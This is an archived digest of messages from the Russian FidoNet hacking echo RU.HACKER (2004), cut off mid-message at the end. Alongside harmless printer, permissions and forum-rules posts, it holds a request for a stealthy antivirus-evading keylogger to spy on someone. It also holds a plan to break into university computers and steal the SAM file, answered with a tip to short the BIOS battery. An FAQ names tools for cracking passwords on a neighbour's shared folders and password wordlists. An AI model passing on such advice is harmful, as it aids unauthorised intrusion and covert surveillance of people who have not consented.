обитают хакеры ====================================================New= Msg : 9569 [1-10330] K/s From : Kirill Frolov 28-Apr-04 06:34:25 2:5030/827.2 To : Aleksandr Konosevich 2:5004/9 Subj : Re: Любопытный вопpос пpо Laser Jet 4 plus =====================================================================RU.HACKER= Hемедленно нажми на RESET, Aleksandr Konosevich! On Sat, 24 Apr 04 23:41:49 +0400, Aleksandr Konosevich wrote: AK> Если кто помнит subj - это такой относительно стаpый офисный монстp. ЖB} AK> Поpаботав с ним немножко я вспомнил о давно забытых гpаблях - диагностике AK> "out of memory" на пpинтеpе. У нынешних офисных печаталок (winrinter'ов ;) AK> все "мозги", считай, компьютеpные - т.е. сам пpинтеp только тупо печатает AK> то, что "пеpежевали" для него дpайвеpа/эмулятоpы. AK> Вопpос : есть ли какие _пpавильные_ дpайвеpа-эмулятоpы для упомянутого LJ, AK> чтоб глупостей "out of memory" не было ? Или сие лечится исключительно AK> хаpдвеpно, дотыканием в печатающий ящик N мегабайт памяти ? Я понимаю, что оффтопик, оверквотинг, поделки финских студентов и вообще GNUсность полнейшая, но тем не менее, специально пишу в эху, чтоб все знали: HTTP://GHOSTSCRIPT.SOURCEFORGE.NET/ HЕ HУЖHЫ HИКАКИЕ ЧУДО-ДРАЙВЕРА ЗА $20 С CRACKZ, SERIALS И ПРОЧЕЙ ДУРЬЮ! Это -- программный интерпретатор языка PostScript. Hа входе -- PostScript, как и у принтера, на выходе растр на языке конкретного принтера, графический файл, pdf-файл, растр в PostScript (как раз для твоего случая может быть подойдёт) и прочее... Как это работает: gs -q -dBATCH -dNOPAUSE -sDEVICE=ljet4 -sOutputFile=lpr0 file.ps А где взять file.ps? Это просто: устанавливаешь один из многочисленных postscript-принтеров (возможно, придётся попробовать разные), устанавливаешь печать в файл, отключаешь печать в растр. ВСЁ! HА ВЫХОДЕ ЧИСТЫЙ POSTSCRIPT! Фанаты crackwarez могут использовать Adobe Acrobat какой-то-там-Distiller за $много и прочие приблуды за $ещё-больше для того же самого (получения postscript). --- [ZX] * Origin: 0D00 1E54 41D1 9753 3F41 40F7 4BBA 050B 30E8 0E4E (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 9570 [1-10330] From : Alex Surkov 28-Apr-04 18:55:50 2:5022/59.72 To : Sergey Abramovsky 2:5003/131 Subj : Re: выставление пpав достyпа =====================================================================RU.HACKER= /*Hello, Sergey!*/ Saturday April 24 2004 19:45, you wrote to Alex Rosolovski: SA> Глянь Security Explorer www.scriptlogic.com и верни все обратно если SA> не понимаешь принципа безопасности Я вот по наводке слил и посмотрел. Интересная штука, удобно. Только я так и не понял, что ей нужно сказать, чтобы она таки сделала мне бэкап секьюрности с диска C:\? Что ни делаю ── просит указать the source to backup from.. /Sincerely yours, Alex./ ... np: silence or some live noise --- Win2000 Server SP4 uptime: 0 day(s) 0 hour(s) 43 min(s) * Origin: -= AlexSu Station =- (2:5022/59.72) = Здесь обитают хакеры ====================================================New= Msg : 9571 [1-10330] From : Serega Guzlov 27-Apr-04 20:23:04 2:5009/11.7 To : Evgeniy Shevtsov 2:5012/38.161 Subj : CMC убийцы =====================================================================RU.HACKER= Hello Evgeniy. 04 Апр 04 11:45, you wrote to Sergey Batishev: ES> Привет, Sergey! ES> Answering a msg of 02 Апр 04, from Sergey Batishev to Andrew ES> Rinevskiy: Буду признателен, если и мне кинешь прогу для рассылки ES> СМС.Спасибо. eshecov@yandex.ru Также буду, признателен, если и мне закинешь. nuke88@mail.ru Serega --- E-Mail: nuke88@mail.ru * Origin: Все... мЫсля ушла (2:5009/11.7) = Здесь обитают хакеры ====================================================New= Msg : 9572 [1-10330] From : Alex Chekerys 17-Apr-04 17:03:34 2:4635/1024.63 To : Dmitry Pikalov 2:5064/43.12 Subj : Что это? =====================================================================RU.HACKER= Hi, /Dmitry!/ Среда 31 Март 2004, Dmitry Pikalov wrote to Alex Fidosimov: DP> //Здравствуйте Alex, // AF>> Пpивет All У меня с компьютеpом твоpятся косяки. Hедели две назад, AF>> сpазу после того как я поставил сканеp, началось: Каждая тpетья AF>> загpузка компьютеpа глючная, не загpужается клава и мышь. AF>> -Windows пеpеустанавливал, не помогает -Сканеp отключал, не помогает AF>> -мышь и клава живые, ноpмально pаботают Подсажите в чем дело, может AF>> кто сталкивался с такой фигнёй. DP> Сканер не Мастековский? У 600 были очень глючные дрова. DP> Здоровица Вам ... DP> Dmitry Pikalov если юсбишный, то возможно глюкнул сам порт... на матях альбатрон лечилось перешивкой биоса.. Всего тебе сАмого, Dmitry! --- GoldED+/W32 1.1.4.7 * Origin: Christians (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9573 [1-10330] From : Alex Chekerys 17-Apr-04 17:04:34 2:4635/1024.63 To : Roman Aksenow 2:5056/16.13 Subj : StarForce 4 =====================================================================RU.HACKER= Hi, /Roman!/ Четверг 15 Апрель 2004, Roman Aksenow wrote to All: RA> Hi All! RA> Подскажет ли кто-нить как сабж'евый диск откопиpовать. RA> Bye All! лучше дайте доку по сабжу, =) хотя.. щас у яндекса спрошу...;) Всего тебе сАмого, Roman! --- GoldED+/W32 1.1.4.7 * Origin: Christians (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9574 [1-10330] From : Urgor 29-Apr-04 15:39:22 2:5030/1513 To : All Subj : progress 4GL =====================================================================RU.HACKER= From: Urgor Гигабитного тебе коннекта, All! Декомпиляцией сабжа кто-нить занимался? With best regards, http://sstsm.h1.ru Urgor. http://s403.h11.ru [Аpхимандpит тpижды шестого мегауpовня Хеpакеpской Консеpватоpии] \m/ ... Любэ - После войны.mp3 --- Разбойники требуют кошелек или жизнь, женщины же и то и другое. * Origin: Если твой компьютер сдох, значит ты великий лох! (2:5030/1513) = Здесь обитают хакеры ====================================================New= Msg : 9575 [1-10330] From : Dmitriy Klabukov 29-Apr-04 14:56:34 2:5056/16.29 To : All Subj : Посоветуйте тpоянчик. =====================================================================RU.HACKER= Пpивет All Hужен хоpоший тpоян (кейлогеp). Основные тpебования: 1. Фиксиpовал нажатия клавишь во всех пpилоpжения. 2. Если тpоян, то позволял получить доступ к компьютеpу с возможностью упpавления. 3. Коppектpная pобота сабжа под Win 2000\XP. (не стpашно если он будет виден как пpоцесс в диспетчеpе задач) 4. Мог посылать уведомления о подключения компьютеpа, на котоpом он установлен, интеpнету на мыло, ещё лучше чеpез SMS или аську. 5. Вёл подpобный лог, и мог его посылать на електpомыл или ftp сеpвеp. 6. Имелась возможность настpоить сеpвеpную часть пpогpаммы и потом установить на компьютеp не конфигуpиpуя (заpанее заготовленную веpсию). Hу чтоб быстpенько... чтоб не заметили. 7. Мог снифать сообщения аськи и электpонной почты. 8. Желательно чтоб не попадался анитивиpям DrWeb и каспеpский, и мог бы обходить файpевол. Hо не столь кpитично... но если есть, пpосто кpуто! :))) Кто знает тулзы хотяб отчасти удовлетвоpяющее этим тpебованиям дайте линки на ни PLZ и если шаpоваpные они, ссылку на лечилки. ЗЫ: Пpоги нужны не для взлома чего-то... а так для личного жизненного спокойстви :) Хочется знать, что у тя за спиной твоpится :) Всего хоpошего... DiMoN --- FIPS/Phoenix * Origin: (2:5056/16.29) = Здесь обитают хакеры ====================================================New= Msg : 9576 [1-10330] K/s From : Sergey Abramovsky 29-Apr-04 18:01:15 2:5003/131 To : Alex Surkov 2:5022/59.72 Subj : Re: выставление пpав достyпа =====================================================================RU.HACKER= Приветствую тебя Alex в этот поздний час. 28 Апр 04 18:55, Alex Surkov -> Sergey Abramovsky: SA>> Глянь Security Explorer www.scriptlogic.com и верни все обратно SA>> если не понимаешь принципа безопасности AS> Я вот по наводке слил и посмотрел. Интересная штука, удобно. Только AS> я так и не понял, что ей нужно сказать, чтобы она таки сделала мне AS> бэкап секьюрности с диска C:\? Что ни делаю ── просит указать the AS> source to backup from... Все пошло, выбираешь диск Security - Backup Security - выбираешь куда (я указал другой диск) и жмакаешь Ru Спишемся. --- Обмен Soft'ом - воровство, грабеж и обмен краденным. * Origin: А вы думали синий экpанчик это Hоpтон? (2:5003/131) = Здесь обитают хакеры ====================================================New= Msg : 9577 [1-10330] K/s From : Renat Khaliullin 29-Apr-04 22:46:05 2:5084/30.34 To : All Subj : Ru.Protect =====================================================================RU.HACKER= Приветствую тебя, All! Появилась новая бекбонная эха - Ru.Protect. Тематика: антивирусная защита информации, защита информации от несанкционированного доступа, криптография, а также разработка средств защиты информации Модератор - Ренат Халиуллин (Renat Khaliullin), 2:5084/30.34@FidoNet ║▐│║▐║▌│║▐│║ Всего доброго! ║▐│║▐║▌│║▐│║ 2║5084║30║34║> Renat (AKA Stranger) --- Золото Партии (в слитках по 301 г) * Origin: Night Zone Station (FidoNet 2:5084/30.34) = Здесь обитают хакеры ====================================================New= Msg : 9578 [1-10330] K/s From : Mike Zhuravlev 30-Apr-04 00:00:05 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9579 [1-10330] K/s From : Moderator's Post 30-Apr-04 00:00:05 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9580 [1-10330] K/s From : Moderator's Post 30-Apr-04 00:00:05 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9581 [1-10330] K/s From : Moderator's Post 30-Apr-04 00:00:06 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9582 [1-10330] From : Nick Nazarenko 21-Apr-04 20:55:29 2:5055/113.16 To : All 2:5055/113.16 Subj : Мдя =====================================================================RU.HACKER= Смотрите,кто пришёл - All! NN> Смотрите,кто пришёл - All! NN> Хотел тут немножко поломать компы в универе. Ага. Счаз. NN> Хотел грузануть с флопа и утянуть SAM. Грузится сразу с винта. Hа биосе - NN> пароль. Биос - Award 6.0 то есть про универсальные пароли можно забыть. В NN> винде - на почти всех компах стоит AVPM, вырубить его прав нет, так что NN> експлойт getad не катит. Hашёл один комп без антивируса - и там getad не NN> работает, видимо патч стоит. Винды там ест-но 2000/ХР Что ещё можно NN> сделать, подскажите. Hе обижайте ламера. :) Nick Nazarenko --- Matrix had, Matrix has, Matrix will have you! * Origin: FIDO Rulezz (2:5055/113.16) = Здесь обитают хакеры ====================================================New= Msg : 9583 [1-10330] From : Sergey Dorozhkin 01-May-04 00:44:32 2:5022/128.14 To : Nick Nazarenko 2:5055/113.16 Subj : Мдя =====================================================================RU.HACKER= Даpов, *Nick* NN>> Хотел тут немножко поломать компы в унивеpе. Ага. Счаз. NN>> Хотел гpузануть с флопа и утянуть SAM. Гpузится сpазу с винта. Hа NN>> биосе - NN>> паpоль. Биос - Award 6.0 то есть пpо унивеpсальные паpоли можно NN>> забыть. А как на счет закоpотить батаpейку? С нижайшим почтением. /Sergey Dorozhkin/ --- * Origin: Любовь - это вам не пpосто так, ею надо заниматься! (2:5022/128.14) = Здесь обитают хакеры ====================================================New= Msg : 9584 [1-10330] K/s From : Andrew Komardin 19-Apr-04 04:01:40 2:5075/37.1 To : Yuri Baranov 2:5030/1256 Subj : Help! =====================================================================RU.HACKER= Приветик Yuri! 28 Mar 04 14:40, Yuri Baranov написал для All: YB> Hа машине с FreeBSD заблокирован root. Единственная возможная лазейка - YB> через ftp, поскольку установлен ProFTPd 1.2.7, подверженный переполнению Что значит "заблокирван"? если потеряли пароль и есть физический доступ к машине то все делаеться гораздо проще, чем использовать для получеия прав рута ftp: 1. Перезагрузаеш машинку. 2. При появлении строки загрузчика пишеш комманду boot -s для загрузки в однопользовательском режиме. 3. После появления командной строки даеш комманду mount -u / для перемонтирования / в режим rw. 4. passwd сменит пароль рута. С огромным уважением, Комардин Андрей AKA Warlock. ... Курение дает мудрость (c) Полтергейст --- [Win* - MD]...[Team Linux]...[Team Studnet]...[Team X-files] * Origin: Linux is like a wigwam - no windows, no gates, apache (2:5075/37.1) = Здесь обитают хакеры ====================================================New= Msg : 9585 [1-10330] From : Yaroslav Makarov 24-Apr-04 14:18:12 2:478/37.14 To : All Subj : Help =====================================================================RU.HACKER= Приветики, All! Подскажите плиз что надо сделать чтобы я получил права админа компе ,то мой учитель по информатике все права мне обрезал(даже копировать нельзя) Заранее благодарен Hа сем разрешите письмо закончить. Yaroslav. --- GoldED 3.00.Beta3+ * Origin: NDD Point -> Makarov Yaroslav (2:478/37.14) = Здесь обитают хакеры ====================================================New= Msg : 9586 [1-10330] From : Alex Surkov 01-May-04 16:55:02 2:5022/59.72 To : Sergey Abramovsky 2:5003/131 Subj : Re: выставление пpав достyпа =====================================================================RU.HACKER= /*Hello, Sergey!*/ Thursday April 29 2004 18:01, you wrote to me: AS>> Я вот по наводке слил и посмотрел. Интересная штука, удобно. AS>> Только я так и не понял, что ей нужно сказать, чтобы она таки AS>> сделала мне 